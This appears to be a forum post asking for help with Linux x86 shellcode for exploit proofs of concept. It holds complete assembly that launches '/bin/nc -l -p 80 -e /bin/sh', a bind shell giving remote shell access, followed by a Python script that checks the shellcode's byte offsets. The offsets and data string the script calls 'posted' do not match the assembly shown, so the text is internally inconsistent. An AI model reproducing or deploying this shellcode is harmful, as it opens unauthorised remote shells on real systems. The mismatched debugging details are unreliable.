Linux Intel Assembly for shellcode - Programmers Heaven


Linux Intel Assembly for shellcode

I am trying to learn how to write shellcode for my proofs of concept for exploits I find, but I am not very good at assembly.
This is the code I was working on, and for some reason it assembles fine, but I think somewhere I might have made a mistake in some calculation for something? It basically launches Netcat like I asked it to but doesn't run the rest of the netcat command...

section .text
global _start

_start:
    jmp short b                 ; jump over the data so that "call a" pushes its address

a:
    pop esi                     ; esi = address of the data string below
    xor eax, eax                ; eax = 0; al is the NUL byte used as terminator
    mov byte [esi + 7], al      ; terminate /bin/nc  (offset of its '#')
    mov byte [esi + 10], al     ; terminate -l
    mov byte [esi + 13], al     ; terminate -p
    mov byte [esi + 16], al     ; terminate 80   (was 17: that overwrote the '-' of -e)
    mov byte [esi + 19], al     ; terminate -e   (was 20: that overwrote the '/' of /bin/sh)
    mov byte [esi + 27], al     ; terminate /bin/sh
    mov dword [esi + 28], esi   ; argv[0]: address of /bin/nc in AAAA
    lea ebx, [esi + 8]          ; get address of -l
    mov dword [esi + 32], ebx   ; argv[1]: store address of -l in BBBB
    lea ebx, [esi + 11]         ; get address of -p
    mov dword [esi + 36], ebx   ; argv[2]: store address of -p in CCCC
    lea ebx, [esi + 14]         ; get address of 80
    mov dword [esi + 40], ebx   ; argv[3]: store address of 80 in DDDD
    lea ebx, [esi + 17]         ; get address of -e
    mov dword [esi + 44], ebx   ; argv[4]: store address of -e in EEEE
    lea ebx, [esi + 20]         ; get address of /bin/sh
    mov dword [esi + 48], ebx   ; argv[5]: store address of /bin/sh in FFFF
    mov dword [esi + 52], eax   ; argv[6]: NULL in GGGG
    mov al, 0x0b                ; sys_execve
    mov ebx, esi                ; program: /bin/nc
    lea ecx, [esi + 28]         ; argument array: /bin/nc -l -p 80 -e /bin/sh
    lea edx, [esi + 52]         ; envp: NULL
    int 0x80                    ; call the kernel

b:
    call a
    db '/bin/nc#-l#-p#80#-e#/bin/sh#AAAABBBBCCCCDDDDEEEEFFFFGGGG'
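The kind of mistake above (a NUL written one byte past the '#' it was meant to replace, so it lands on the first byte of the next argument) is easy to catch mechanically: derive the separator and pointer-slot offsets from the data string itself and compare them with the offsets hard-coded in the assembly. The following Python checker is an added example, not code from the original post; the data string and the offset lists are copied from the post, and the layout rule it assumes is the post's own (each argument is followed by a '#', and the 4-byte argv slots plus a NULL slot start right after the last '#').

```python
"""Added example (not from the original post): verify hand-computed offsets
in a '#'-separated data string against its actual byte layout."""

# Data string exactly as posted (note the five F's, copied as-is).
POSTED_DATA = b'/bin/nc#-l#-p#80#-e#/bin/sh#AAAABBBBCCCCDDDDEEEEFFFFFGGGG'

# Offsets hard-coded in the posted assembly.
POSTED_TERMINATORS = [7, 10, 13, 17, 20, 27]       # mov byte [esi + N], al
POSTED_SLOTS = [29, 33, 37, 41, 45, 49, 53]        # mov long [esi + N], reg


def expected_layout(data, sep=b'#'):
    """Return (field_starts, separator_offsets, slot_offsets) derived from data."""
    starts, seps = [], []
    pos = 0
    while True:
        i = data.find(sep, pos)
        if i == -1:
            break
        starts.append(pos)       # first byte of this argument
        seps.append(i)           # the '#' that must become NUL
        pos = i + 1
    base = seps[-1] + 1          # pointer area begins right after the last '#'
    slots = [base + 4 * k for k in range(len(starts) + 1)]   # one slot per arg + NULL
    return starts, seps, slots


def check_offsets(data, terminators, slots, sep=b'#'):
    """List every hard-coded offset that does not match the real layout."""
    starts, seps, _ = expected_layout(data, sep)
    problems = []
    for n, (want, got) in enumerate(zip(seps, terminators)):
        if got == want:
            continue
        field = data[starts[n]:seps[n]].decode()
        # Which argument does the misplaced NUL actually land in?
        hit = next((data[s:e].decode() for s, e in zip(starts, seps) if s <= got < e), None)
        msg = f"argv[{n}] {field!r}: NUL written at {got}, its '#' is at {want}"
        if hit is not None:
            msg += f" (clobbers {hit!r})"
        problems.append(msg)
    # Every 4-byte pointer slot must lie inside the data string.
    for n, off in enumerate(slots):
        if off + 4 > len(data):
            problems.append(f"argv slot {n} at {off} runs past the {len(data)}-byte string")
    return problems


if __name__ == "__main__":
    starts, seps, slots = expected_layout(POSTED_DATA)
    print("argument starts:", starts)
    print("'#' offsets    :", seps)
    print("argv slots     :", slots)
    for p in check_offsets(POSTED_DATA, POSTED_TERMINATORS, POSTED_SLOTS):
        print("PROBLEM:", p)
```

Run against the posted values it reports two problems: the NUL meant for "80" is written at 17 (the '#' is at 16) and clobbers the '-' of "-e", and the NUL meant for "-e" is written at 20 and clobbers the '/' of "/bin/sh". That is exactly why nc starts but its remaining arguments are wrong. The pointer slots at 29, 33, ... happen to fit only because of the extra F in the placeholder; the derived layout puts them at 28, 32, ... 52.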